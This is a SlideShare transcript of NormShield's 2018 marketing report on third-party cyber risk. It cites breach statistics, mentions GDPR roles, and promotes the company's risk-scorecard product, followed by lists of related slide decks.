SlideShare a Scribd company logo

3rd Part Cyber Risk Report - 2018

NormShield
NormShield

THE WEAKEST LINK MAY NOT BE IN YOUR SYSTEM - 3rd Party Cyber Risk Report @Normshield - 2018

Technology
1 of 11
1 THE WEAKEST LINK MAY NOT BE IN YOUR SYSTEM Phone +1 (571) 335-0222 Email info@normshield.com 8200 Greensboro Dr. Ste 900 McLean, VA 22102 NormShield 3rd Party Cyber Risk Report
www.normshield.com 2 NormShield 3rd Party Cyber Risk Report The weakest link may not be in your system Matt, CISO of a large company, comes to office on Friday. He is a very successful Chief of Information Security Office and he is very confident of capabilities of his team. They handle all vulnerabilities inside their own system, continuously scan and monitor their system, they use cutting-edge security tools such as firewalls, WAFs, IDS/IPS, and Data Leak Protection technologies. The cyber security awareness of the employees is quite high and they do everything to avoid phishing-type attacks. The possibility that something goes wrong is very low. However, that Friday morning, when Matt looks at online news, he shockingly discovers that many of their client information is leaked. He starts to investigate the situation and finds nothing in their own system. But later, he finds out that the leak is originated from a 3rd party, a data management company which manages emails of large companies.
www.normshield.com 3 NormShield 3rd Party Cyber Risk Report Recently, we have heard similar stories about breaches because of 3rd parties such as vendors, subsidiaries, web hosting companies, law firm partners, firms in supply chain, etc. Large companies such as financial institutions, e-commerce companies have been improving their cyber security system for external or even internal attacks. They can internally identify vulnerabilities of their own system by monitoring and/or scanning tools and take necessary precautions. However, all these efforts might be for nothing if 3rd party cyber risk is unknown. 3rd party risk management and data governance are growing concerns. It is not surprising that, very recently, the revised version of the U.S. National Institute of Standards and Technology’s Cybersecurity Framework (NIST) now includes supply chain cyber risk management1. 1 https://www.wsj.com/articles/amid-national-security-warnings-nist-adds-supply-chain-security-to-cyber- framework-1524175900
www.normshield.com 4 NormShield 3rd Party Cyber Risk Report What is 3rd Party? 3rd parties include broad range of companies you directly worked with such as data management companies, law firms, e-mail providers, web hosting companies, subsidiaries, vendors, sub-contractors, basically any company some of whose employees have somewhat access to your system or your data. However, third party cyber risk is not limited to these companies. Any external software or hardware that you use for your system also poses a cyber risk. Even the JavaScript that is added to your website for analytics may cause a breach by collection information of people that visited your website. Considering some recent hacks by putting backdoors to well-known software, such as CCleaner in 2017, the definition of 3rd party should not be limited to only the companies that you work. Even IoT devices can be considered as a third party and can be source of a breach. Very recently a casino was hacked through its Internet-connected thermometer in an aquarium in the lobby of the casino.
www.normshield.com 5 NormShield 3rd Party Cyber Risk Report GDPR perspective on third party The upcoming European Union’s General Data Protection Regulation (GDPR) has the terms third-party data processor and controller. As the name suggests, a third-party data processor is an entity that processes personally identifiable information (PII) on behalf of a controller. Basically, it can be e-mail service providers, customer relationship management services, etc. A controller is defined by the GDPR as an entity that determines how that data will be processed and for what reason. All companies work with third-party data processors have to ensure that these third-parties comply or intent to comply the upcoming GDPR rules.
www.normshield.com 6 NormShield 3rd Party Cyber Risk Report Recent breaches caused by 3rd parties The figure below shows recent breaches/incidents caused by third parties. As seen from these breaches/incidents, the third party that caused a breach might be a law firm (usually the weakest link), an accounting firm, or even a firm that handles HVAC jobs; or it might be companies that provides web hosting, data management, e-mail services, etc.
www.normshield.com 7 NormShield 3rd Party Cyber Risk Report How much do you trust the cyber security measurements of 3rd-party companies? A recent survey conducted by Ponemon Institute reveals that 56% have experienced a 3rd-party breach in 2017, which is an 7% increase compared to previous year2 . Another survey conducted by Deloitte in 2016 gives more depressive numbers, reporting that 87% of organizations have experienced a disruptive incident with third parties in the last 2-3 years. Another research in 2016, sourced by Soha Systems, reports that 63% of all breaches were related to third parties. The fines paid because of the breaches are as quite large as more than 7 million $US per breach. For instance, Target paid more than $116 million in civil settlements related to its 2013 breach caused by an HVAC company. The total cost to company because of this breach exceeded $290 million. With upcoming GDPR, we shall see higher fines for each breach related to EU citizens. The GDPR fines can go up to 20 million Euros or 4% of annual global turnover (whichever is the highest). 2 https://www.opus.com/ponemon/
www.normshield.com 8 NormShield 3rd Party Cyber Risk Report How much do you know about third parties? The Ponemon Institute report shows that 57% of companies do not know if they share sensitive information with third parties and they don’t know either if the third parties’ security measurements would prevent a breach. As a result, only 17% feel that they are highly capable of mitigating third party risk and 60% feel unprepared to check or verify their third parties.
www.normshield.com 9 NormShield 3rd Party Cyber Risk Report How to assess 3rd party risk? Many companies either do not have any assessment on cyber risk of third parties or use old-school questionnaire methodology (sending a bunch of questions for third party to answer and assessing the risk based on the answer). First of all, questionnaire-based assessment is very time consuming (even though there are some online tools for it) and answers are not reliable. Even if we assume that answers are correct and we collect the results quickly, there might be some cyber risks that are invisible to third party. This type of “hidden” risks can only be detected by gathering cyber threat intelligence and evaluating the risk. Fortunately, there are several platforms that gather third party data and provide a risk score or security rating for companies related to a certain company. NormShield, BitSight, Security Scorecard, UpGuard, and RiskRecon are top players in the third-party risk scoring business. They all provide risk scores or security rating for any company added as a third-party and assess its cyber risk and how it affects the main company. This type of information can also be used for mergers and acquisitions.
www.normshield.com 10 NormShield 3rd Party Cyber Risk Report Using NormShield Cyber Risk Scorecard to assess third parties? As an example, we explain how to use NormShield Cyber Risk Scorecard to assess the third parties for a company. In NormShield Cyber Risk Scorecard, you can create an ecosystem that will includes the main company and all the third- parties to be added. More than one ecosystem can be created such as an ecosystem including the companies/branches owned by the main company or an ecosystem for third-parties or you can even create an ecosystem which includes only law firms that you work with. Then, a third-party can easily be added by only typing its website. NormShield first discover the digital footprint of the third party (domains, subdomains, IP addresses, DNS Records, services, social media accounts, ASN, e-mails, company info, etc.) to see what hackers see on this third party. Then NormShield evaluates the cyber risk by its proprietary algorithm on 20 different categories and how the cyber risk of this third party affects the overall ecosystem. Below is a list of some categories taken into consideration; Main company then can contact to third company and discuss the issues found by NormShield Cyber Risk Scorecard and remediate and mitigate the risk.
www.normshield.com 11 NormShield 3rd Party Cyber Risk Report About NormShield We provide Cyber Risk Scorecard for companies just like FICO score. Cyber security is on every Board’s agenda, and the average total cost of a data breach has risen to $4 million (Ponemon/IBM). NormShield Cyber Risk Scorecards provide the information necessary to protect business from cyber-attacks. The scorecards provide a letter grade and a drill down into the data for each risk category so that remediation of vulnerabilities can be prioritized. Unified Threat & Vulnerability Orchestration Platform and Cyber Risk Scorecard. To learn your company’s risk score, please visit https://www.normshield.com/ and click on Learn Now. www.normshield.com 1 (571) 335 02 22 info@normshield.com NormShield HQ 8200 Greensboro Drive Suite 900 McLean, VA 22102

Recommended

idg_secops-solutions
idg_secops-solutionsidg_secops-solutions
idg_secops-solutionsJonny Nässlander
 
Dark Net The Devil in the Details - Larry Boettger and Michael Horsch Fizz
Dark Net The Devil in the Details - Larry Boettger and Michael Horsch FizzDark Net The Devil in the Details - Larry Boettger and Michael Horsch Fizz
Dark Net The Devil in the Details - Larry Boettger and Michael Horsch Fizz
FitCEO, Inc. (FCI)
 
Fintech Cyber Security Survey Hong Knog 2018
Fintech Cyber Security Survey Hong Knog 2018Fintech Cyber Security Survey Hong Knog 2018
Fintech Cyber Security Survey Hong Knog 2018
Entersoft Security
 
Forcepoint Whitepaper 2016 Security Predictions
Forcepoint Whitepaper 2016 Security PredictionsForcepoint Whitepaper 2016 Security Predictions
Forcepoint Whitepaper 2016 Security Predictions
Kim Jensen
 
InformationSecurity_11141
InformationSecurity_11141InformationSecurity_11141
InformationSecurity_11141sraina2
 
Cybersecurity: Whose job is it anyway?
Cybersecurity: Whose job is it anyway?Cybersecurity: Whose job is it anyway?
Cybersecurity: Whose job is it anyway?
Guy Pearce
 
Review on 3rd-party Cyber Risk Assessment and Scoring Tools
Review on 3rd-party Cyber Risk Assessment and Scoring ToolsReview on 3rd-party Cyber Risk Assessment and Scoring Tools
Review on 3rd-party Cyber Risk Assessment and Scoring Tools
NormShield
 
Reasons to be secure
Reasons to be secureReasons to be secure
Reasons to be secure
Meg Weber
 

Recommended

idg_secops-solutions
idg_secops-solutionsidg_secops-solutions
idg_secops-solutionsJonny Nässlander
 
Dark Net The Devil in the Details - Larry Boettger and Michael Horsch Fizz
Dark Net The Devil in the Details - Larry Boettger and Michael Horsch FizzDark Net The Devil in the Details - Larry Boettger and Michael Horsch Fizz
Dark Net The Devil in the Details - Larry Boettger and Michael Horsch Fizz
FitCEO, Inc. (FCI)
 
Fintech Cyber Security Survey Hong Knog 2018
Fintech Cyber Security Survey Hong Knog 2018Fintech Cyber Security Survey Hong Knog 2018
Fintech Cyber Security Survey Hong Knog 2018
Entersoft Security
 
Forcepoint Whitepaper 2016 Security Predictions
Forcepoint Whitepaper 2016 Security PredictionsForcepoint Whitepaper 2016 Security Predictions
Forcepoint Whitepaper 2016 Security Predictions
Kim Jensen
 
InformationSecurity_11141
InformationSecurity_11141InformationSecurity_11141
InformationSecurity_11141sraina2
 
Cybersecurity: Whose job is it anyway?
Cybersecurity: Whose job is it anyway?Cybersecurity: Whose job is it anyway?
Cybersecurity: Whose job is it anyway?
Guy Pearce
 
Review on 3rd-party Cyber Risk Assessment and Scoring Tools
Review on 3rd-party Cyber Risk Assessment and Scoring ToolsReview on 3rd-party Cyber Risk Assessment and Scoring Tools
Review on 3rd-party Cyber Risk Assessment and Scoring Tools
NormShield
 
Reasons to be secure
Reasons to be secureReasons to be secure
Reasons to be secure
Meg Weber
 
2020 Data Breach Investigations Report (DBIR)
2020 Data Breach Investigations Report (DBIR)2020 Data Breach Investigations Report (DBIR)
2020 Data Breach Investigations Report (DBIR)
- Mark - Fullbright
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015Jeremiah Grossman
 
Global Megatrends in Cybersecurity – A Survey of 1,000 CxOs
Global Megatrends in Cybersecurity – A Survey of 1,000 CxOsGlobal Megatrends in Cybersecurity – A Survey of 1,000 CxOs
Global Megatrends in Cybersecurity – A Survey of 1,000 CxOs
Argyle Executive Forum
 
Índice de software sin licencia en el mundo.
Índice de software sin licencia en el mundo. Índice de software sin licencia en el mundo.
Índice de software sin licencia en el mundo.
Luis Noguera
 
2019 Data Breach Investigations Report (DBIR)
2019 Data Breach Investigations Report (DBIR)2019 Data Breach Investigations Report (DBIR)
2019 Data Breach Investigations Report (DBIR)
- Mark - Fullbright
 
The Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch Fizz
The Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch FizzThe Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch Fizz
The Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch Fizz
FitCEO, Inc. (FCI)
 
Perception Gaps in Cyber Resilience: What Are Your Blind Spots?
Perception Gaps in Cyber Resilience: What Are Your Blind Spots?Perception Gaps in Cyber Resilience: What Are Your Blind Spots?
Perception Gaps in Cyber Resilience: What Are Your Blind Spots?
Sarah Nirschl
 
STUDY: Website Vulnerability Assessment
STUDY: Website Vulnerability AssessmentSTUDY: Website Vulnerability Assessment
STUDY: Website Vulnerability Assessment
Symantec
 
Top Solutions and Tools to Prevent Devastating Malware White Paper
Top Solutions and Tools to Prevent Devastating Malware White PaperTop Solutions and Tools to Prevent Devastating Malware White Paper
Top Solutions and Tools to Prevent Devastating Malware White Paper
NetIQ
 
Security troubles in e commerce website
Security troubles in e commerce websiteSecurity troubles in e commerce website
Security troubles in e commerce website
Dr. Raghavendra GS
 
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONSCybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Randall Chase
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
Jeremiah Grossman
 
Whitepaper | Cyber resilience in the age of digital transformation
Whitepaper | Cyber resilience in the age of digital transformationWhitepaper | Cyber resilience in the age of digital transformation
Whitepaper | Cyber resilience in the age of digital transformation
Nexon Asia Pacific
 
Proofpoint Understanding Email Fraud in 2018
Proofpoint Understanding Email Fraud in 2018 Proofpoint Understanding Email Fraud in 2018
Proofpoint Understanding Email Fraud in 2018
Proofpoint
 
Who is the next target and how is big data related ulf mattsson
Who is the next target and how is big data related ulf mattssonWho is the next target and how is big data related ulf mattsson
Who is the next target and how is big data related ulf mattssonUlf Mattsson
 
2011 Annual Study - U.S. Cost of a Data Breach - March 2012
2011 Annual Study - U.S. Cost of a Data Breach - March 20122011 Annual Study - U.S. Cost of a Data Breach - March 2012
2011 Annual Study - U.S. Cost of a Data Breach - March 2012
Symantec
 
ISTR Internet Security Threat Report 2019
ISTR Internet Security Threat Report 2019ISTR Internet Security Threat Report 2019
ISTR Internet Security Threat Report 2019
- Mark - Fullbright
 
11 Reasons Why Your Company Could Be In Danger
11 Reasons Why Your Company Could Be In Danger11 Reasons Why Your Company Could Be In Danger
11 Reasons Why Your Company Could Be In Danger
Copper Mobile, Inc.
 
Cyber Security Threats | IIA Boise Chapter
Cyber Security Threats | IIA Boise ChapterCyber Security Threats | IIA Boise Chapter
Cyber Security Threats | IIA Boise ChapterPatricia M Watson
 
Verizon DBIR 2021
Verizon DBIR 2021Verizon DBIR 2021
Verizon DBIR 2021
SOCRadar Inc
 
Data Safety And Security
Data Safety And SecurityData Safety And Security
Data Safety And SecurityConstantine Karbaliotis
 
Cyber Security index
Cyber Security indexCyber Security index
Cyber Security index
sukiennong.vn
 

More Related Content

What's hot

2020 Data Breach Investigations Report (DBIR)
2020 Data Breach Investigations Report (DBIR)2020 Data Breach Investigations Report (DBIR)
2020 Data Breach Investigations Report (DBIR)
- Mark - Fullbright
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015Jeremiah Grossman
 
Global Megatrends in Cybersecurity – A Survey of 1,000 CxOs
Global Megatrends in Cybersecurity – A Survey of 1,000 CxOsGlobal Megatrends in Cybersecurity – A Survey of 1,000 CxOs
Global Megatrends in Cybersecurity – A Survey of 1,000 CxOs
Argyle Executive Forum
 
Índice de software sin licencia en el mundo.
Índice de software sin licencia en el mundo. Índice de software sin licencia en el mundo.
Índice de software sin licencia en el mundo.
Luis Noguera
 
2019 Data Breach Investigations Report (DBIR)
2019 Data Breach Investigations Report (DBIR)2019 Data Breach Investigations Report (DBIR)
2019 Data Breach Investigations Report (DBIR)
- Mark - Fullbright
 
The Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch Fizz
The Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch FizzThe Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch Fizz
The Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch Fizz
FitCEO, Inc. (FCI)
 
Perception Gaps in Cyber Resilience: What Are Your Blind Spots?
Perception Gaps in Cyber Resilience: What Are Your Blind Spots?Perception Gaps in Cyber Resilience: What Are Your Blind Spots?
Perception Gaps in Cyber Resilience: What Are Your Blind Spots?
Sarah Nirschl
 
STUDY: Website Vulnerability Assessment
STUDY: Website Vulnerability AssessmentSTUDY: Website Vulnerability Assessment
STUDY: Website Vulnerability Assessment
Symantec
 
Top Solutions and Tools to Prevent Devastating Malware White Paper
Top Solutions and Tools to Prevent Devastating Malware White PaperTop Solutions and Tools to Prevent Devastating Malware White Paper
Top Solutions and Tools to Prevent Devastating Malware White Paper
NetIQ
 
Security troubles in e commerce website
Security troubles in e commerce websiteSecurity troubles in e commerce website
Security troubles in e commerce website
Dr. Raghavendra GS
 
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONSCybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Randall Chase
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
Jeremiah Grossman
 
Whitepaper | Cyber resilience in the age of digital transformation
Whitepaper | Cyber resilience in the age of digital transformationWhitepaper | Cyber resilience in the age of digital transformation
Whitepaper | Cyber resilience in the age of digital transformation
Nexon Asia Pacific
 
Proofpoint Understanding Email Fraud in 2018
Proofpoint Understanding Email Fraud in 2018 Proofpoint Understanding Email Fraud in 2018
Proofpoint Understanding Email Fraud in 2018
Proofpoint
 
Who is the next target and how is big data related ulf mattsson
Who is the next target and how is big data related ulf mattssonWho is the next target and how is big data related ulf mattsson
Who is the next target and how is big data related ulf mattssonUlf Mattsson
 
2011 Annual Study - U.S. Cost of a Data Breach - March 2012
2011 Annual Study - U.S. Cost of a Data Breach - March 20122011 Annual Study - U.S. Cost of a Data Breach - March 2012
2011 Annual Study - U.S. Cost of a Data Breach - March 2012
Symantec
 
ISTR Internet Security Threat Report 2019
ISTR Internet Security Threat Report 2019ISTR Internet Security Threat Report 2019
ISTR Internet Security Threat Report 2019
- Mark - Fullbright
 
11 Reasons Why Your Company Could Be In Danger
11 Reasons Why Your Company Could Be In Danger11 Reasons Why Your Company Could Be In Danger
11 Reasons Why Your Company Could Be In Danger
Copper Mobile, Inc.
 
Cyber Security Threats | IIA Boise Chapter
Cyber Security Threats | IIA Boise ChapterCyber Security Threats | IIA Boise Chapter
Cyber Security Threats | IIA Boise ChapterPatricia M Watson
 
Verizon DBIR 2021
Verizon DBIR 2021Verizon DBIR 2021
Verizon DBIR 2021
SOCRadar Inc
 

What's hot (20)

2020 Data Breach Investigations Report (DBIR)
2020 Data Breach Investigations Report (DBIR)2020 Data Breach Investigations Report (DBIR)
2020 Data Breach Investigations Report (DBIR)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
Global Megatrends in Cybersecurity – A Survey of 1,000 CxOs
Global Megatrends in Cybersecurity – A Survey of 1,000 CxOsGlobal Megatrends in Cybersecurity – A Survey of 1,000 CxOs
Global Megatrends in Cybersecurity – A Survey of 1,000 CxOs
 
Índice de software sin licencia en el mundo.
Índice de software sin licencia en el mundo. Índice de software sin licencia en el mundo.
Índice de software sin licencia en el mundo.
 
2019 Data Breach Investigations Report (DBIR)
2019 Data Breach Investigations Report (DBIR)2019 Data Breach Investigations Report (DBIR)
2019 Data Breach Investigations Report (DBIR)
 
The Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch Fizz
The Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch FizzThe Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch Fizz
The Dark Net - The Devil in the Details - Larry Boettger and Michael Horsch Fizz
 
Perception Gaps in Cyber Resilience: What Are Your Blind Spots?
Perception Gaps in Cyber Resilience: What Are Your Blind Spots?Perception Gaps in Cyber Resilience: What Are Your Blind Spots?
Perception Gaps in Cyber Resilience: What Are Your Blind Spots?
 
STUDY: Website Vulnerability Assessment
STUDY: Website Vulnerability AssessmentSTUDY: Website Vulnerability Assessment
STUDY: Website Vulnerability Assessment
 
Top Solutions and Tools to Prevent Devastating Malware White Paper
Top Solutions and Tools to Prevent Devastating Malware White PaperTop Solutions and Tools to Prevent Devastating Malware White Paper
Top Solutions and Tools to Prevent Devastating Malware White Paper
 
Security troubles in e commerce website
Security troubles in e commerce websiteSecurity troubles in e commerce website
Security troubles in e commerce website
 
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONSCybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
Cybersecurity - you are being targeted -Keyven Lewis, CMIT SOLUTIONS
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
Whitepaper | Cyber resilience in the age of digital transformation
Whitepaper | Cyber resilience in the age of digital transformationWhitepaper | Cyber resilience in the age of digital transformation
Whitepaper | Cyber resilience in the age of digital transformation
 
Proofpoint Understanding Email Fraud in 2018
Proofpoint Understanding Email Fraud in 2018 Proofpoint Understanding Email Fraud in 2018
Proofpoint Understanding Email Fraud in 2018
 
Who is the next target and how is big data related ulf mattsson
Who is the next target and how is big data related ulf mattssonWho is the next target and how is big data related ulf mattsson
Who is the next target and how is big data related ulf mattsson
 
2011 Annual Study - U.S. Cost of a Data Breach - March 2012
2011 Annual Study - U.S. Cost of a Data Breach - March 20122011 Annual Study - U.S. Cost of a Data Breach - March 2012
2011 Annual Study - U.S. Cost of a Data Breach - March 2012
 
ISTR Internet Security Threat Report 2019
ISTR Internet Security Threat Report 2019ISTR Internet Security Threat Report 2019
ISTR Internet Security Threat Report 2019
 
11 Reasons Why Your Company Could Be In Danger
11 Reasons Why Your Company Could Be In Danger11 Reasons Why Your Company Could Be In Danger
11 Reasons Why Your Company Could Be In Danger
 
Cyber Security Threats | IIA Boise Chapter
Cyber Security Threats | IIA Boise ChapterCyber Security Threats | IIA Boise Chapter
Cyber Security Threats | IIA Boise Chapter
 
Verizon DBIR 2021
Verizon DBIR 2021Verizon DBIR 2021
Verizon DBIR 2021
 

Similar to 3rd Part Cyber Risk Report - 2018

Cyber Security index
Cyber Security indexCyber Security index
Cyber Security index
sukiennong.vn
 
We are living in a world where cyber security is a top priority for .pdf
We are living in a world where cyber security is a top priority for .pdfWe are living in a world where cyber security is a top priority for .pdf
We are living in a world where cyber security is a top priority for .pdf
galagirishp
 
Securité : Le rapport 2Q de la X-Force
Securité : Le rapport 2Q de la X-ForceSecurité : Le rapport 2Q de la X-Force
Securité : Le rapport 2Q de la X-Force
Patrick Bouillaud
 
Forrester-Wave-Digital_Risk_Monitoring-Q3-2016
Forrester-Wave-Digital_Risk_Monitoring-Q3-2016Forrester-Wave-Digital_Risk_Monitoring-Q3-2016
Forrester-Wave-Digital_Risk_Monitoring-Q3-2016rsouthal2003
 
Big Data Dectives
Big Data DectivesBig Data Dectives
Big Data Dectives
- Mark - Fullbright
 
A1 - Cibersegurança - Raising the Bar for Cybersecurity
A1 - Cibersegurança - Raising the Bar for CybersecurityA1 - Cibersegurança - Raising the Bar for Cybersecurity
A1 - Cibersegurança - Raising the Bar for Cybersecurity
Spark Security
 
Before the Breach: Using threat intelligence to stop attackers in their tracks
Before the Breach: Using threat intelligence to stop attackers in their tracksBefore the Breach: Using threat intelligence to stop attackers in their tracks
Before the Breach: Using threat intelligence to stop attackers in their tracks
- Mark - Fullbright
 
Security - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaperSecurity - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaper
CMR WORLD TECH
 
Third party risk management with cyber threat intelligence
Third party risk management with cyber threat intelligenceThird party risk management with cyber threat intelligence
Third party risk management with cyber threat intelligence
Charles Steve
 
cybersecurity_alert_feb_12_2015
cybersecurity_alert_feb_12_2015cybersecurity_alert_feb_12_2015
cybersecurity_alert_feb_12_2015Paul Ferrillo
 
Why Cybersecurity is a Data Problem
Why Cybersecurity is a Data ProblemWhy Cybersecurity is a Data Problem
Why Cybersecurity is a Data Problem
Bernard Marr
 
Ways To Protect Your Company From Cybercrime
Ways To Protect Your Company From CybercrimeWays To Protect Your Company From Cybercrime
Ways To Protect Your Company From Cybercrime
thinkwithniche
 
To Be Great Enterprise Risk Managers, CISOs Need to Be Great Collaborators
To Be Great Enterprise Risk Managers, CISOs Need to Be Great CollaboratorsTo Be Great Enterprise Risk Managers, CISOs Need to Be Great Collaborators
To Be Great Enterprise Risk Managers, CISOs Need to Be Great Collaborators
Elizabeth Dimit
 
Cybersecurity After WannaCry: How to Resist Future Attacks
Cybersecurity After WannaCry: How to Resist Future AttacksCybersecurity After WannaCry: How to Resist Future Attacks
Cybersecurity After WannaCry: How to Resist Future Attacks
Strategy&, a member of the PwC network
 
Insight Brief: Security Analytics to Identify the 12 Indicators of Compromise
Insight Brief: Security Analytics to Identify the 12 Indicators of CompromiseInsight Brief: Security Analytics to Identify the 12 Indicators of Compromise
Insight Brief: Security Analytics to Identify the 12 Indicators of Compromise
21CT Inc.
 
November 2017: Part 6
November 2017: Part 6November 2017: Part 6
November 2017: Part 6
seadeloitte
 
Big Iron to Big Data Analytics for Security, Compliance, and the Mainframe
Big Iron to Big Data Analytics for Security, Compliance, and the MainframeBig Iron to Big Data Analytics for Security, Compliance, and the Mainframe
Big Iron to Big Data Analytics for Security, Compliance, and the Mainframe
Precisely
 
Big Data Analytics Solutions
Big Data Analytics SolutionsBig Data Analytics Solutions
Big Data Analytics Solutions
harman041
 

Similar to 3rd Part Cyber Risk Report - 2018 (20)

Data Safety And Security
Data Safety And SecurityData Safety And Security
Data Safety And Security
 
Cyber Security index
Cyber Security indexCyber Security index
Cyber Security index
 
We are living in a world where cyber security is a top priority for .pdf
We are living in a world where cyber security is a top priority for .pdfWe are living in a world where cyber security is a top priority for .pdf
We are living in a world where cyber security is a top priority for .pdf
 
Securité : Le rapport 2Q de la X-Force
Securité : Le rapport 2Q de la X-ForceSecurité : Le rapport 2Q de la X-Force
Securité : Le rapport 2Q de la X-Force
 
IBM X-Force.PDF
IBM X-Force.PDFIBM X-Force.PDF
IBM X-Force.PDF
 
Forrester-Wave-Digital_Risk_Monitoring-Q3-2016
Forrester-Wave-Digital_Risk_Monitoring-Q3-2016Forrester-Wave-Digital_Risk_Monitoring-Q3-2016
Forrester-Wave-Digital_Risk_Monitoring-Q3-2016
 
Big Data Dectives
Big Data DectivesBig Data Dectives
Big Data Dectives
 
A1 - Cibersegurança - Raising the Bar for Cybersecurity
A1 - Cibersegurança - Raising the Bar for CybersecurityA1 - Cibersegurança - Raising the Bar for Cybersecurity
A1 - Cibersegurança - Raising the Bar for Cybersecurity
 
Before the Breach: Using threat intelligence to stop attackers in their tracks
Before the Breach: Using threat intelligence to stop attackers in their tracksBefore the Breach: Using threat intelligence to stop attackers in their tracks
Before the Breach: Using threat intelligence to stop attackers in their tracks
 
Security - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaperSecurity - intelligence - maturity-model-ciso-whitepaper
Security - intelligence - maturity-model-ciso-whitepaper
 
Third party risk management with cyber threat intelligence
Third party risk management with cyber threat intelligenceThird party risk management with cyber threat intelligence
Third party risk management with cyber threat intelligence
 
cybersecurity_alert_feb_12_2015
cybersecurity_alert_feb_12_2015cybersecurity_alert_feb_12_2015
cybersecurity_alert_feb_12_2015
 
Why Cybersecurity is a Data Problem
Why Cybersecurity is a Data ProblemWhy Cybersecurity is a Data Problem
Why Cybersecurity is a Data Problem
 
Ways To Protect Your Company From Cybercrime
Ways To Protect Your Company From CybercrimeWays To Protect Your Company From Cybercrime
Ways To Protect Your Company From Cybercrime
 
To Be Great Enterprise Risk Managers, CISOs Need to Be Great Collaborators
To Be Great Enterprise Risk Managers, CISOs Need to Be Great CollaboratorsTo Be Great Enterprise Risk Managers, CISOs Need to Be Great Collaborators
To Be Great Enterprise Risk Managers, CISOs Need to Be Great Collaborators
 
Cybersecurity After WannaCry: How to Resist Future Attacks
Cybersecurity After WannaCry: How to Resist Future AttacksCybersecurity After WannaCry: How to Resist Future Attacks
Cybersecurity After WannaCry: How to Resist Future Attacks
 
Insight Brief: Security Analytics to Identify the 12 Indicators of Compromise
Insight Brief: Security Analytics to Identify the 12 Indicators of CompromiseInsight Brief: Security Analytics to Identify the 12 Indicators of Compromise
Insight Brief: Security Analytics to Identify the 12 Indicators of Compromise
 
November 2017: Part 6
November 2017: Part 6November 2017: Part 6
November 2017: Part 6
 
Big Iron to Big Data Analytics for Security, Compliance, and the Mainframe
Big Iron to Big Data Analytics for Security, Compliance, and the MainframeBig Iron to Big Data Analytics for Security, Compliance, and the Mainframe
Big Iron to Big Data Analytics for Security, Compliance, and the Mainframe
 
Big Data Analytics Solutions
Big Data Analytics SolutionsBig Data Analytics Solutions
Big Data Analytics Solutions
 

More from NormShield

HOW TO MEASURE WHAT HACKERS KNOW ABOUT YOU
HOW TO MEASURE WHAT HACKERS KNOW ABOUT YOUHOW TO MEASURE WHAT HACKERS KNOW ABOUT YOU
HOW TO MEASURE WHAT HACKERS KNOW ABOUT YOU
NormShield
 
Major 3rd-Party Data Breaches Of 2018
Major 3rd-Party Data Breaches Of 2018Major 3rd-Party Data Breaches Of 2018
Major 3rd-Party Data Breaches Of 2018
NormShield
 
Normshield 2018 Airlines Phishing Report
Normshield 2018 Airlines Phishing ReportNormshield 2018 Airlines Phishing Report
Normshield 2018 Airlines Phishing Report
NormShield
 
Are There Any Domains Impersonating Your Company For Phishing?
Are There Any Domains Impersonating Your Company For Phishing?Are There Any Domains Impersonating Your Company For Phishing?
Are There Any Domains Impersonating Your Company For Phishing?
NormShield
 
NormShield Cyber Risk Rating October 18
NormShield Cyber Risk Rating October 18NormShield Cyber Risk Rating October 18
NormShield Cyber Risk Rating October 18
NormShield
 
NormShield Supply Chain Risk Management Infographic
NormShield Supply Chain Risk Management InfographicNormShield Supply Chain Risk Management Infographic
NormShield Supply Chain Risk Management Infographic
NormShield
 
Third-Party Risk in Regulations
Third-Party Risk in RegulationsThird-Party Risk in Regulations
Third-Party Risk in Regulations
NormShield
 
NormShield Crypto Currency Report 2018
NormShield Crypto Currency Report 2018NormShield Crypto Currency Report 2018
NormShield Crypto Currency Report 2018
NormShield
 
NormShield 2018 Cyber Security Risk Brief
NormShield 2018 Cyber Security Risk BriefNormShield 2018 Cyber Security Risk Brief
NormShield 2018 Cyber Security Risk Brief
NormShield
 

More from NormShield (9)

HOW TO MEASURE WHAT HACKERS KNOW ABOUT YOU
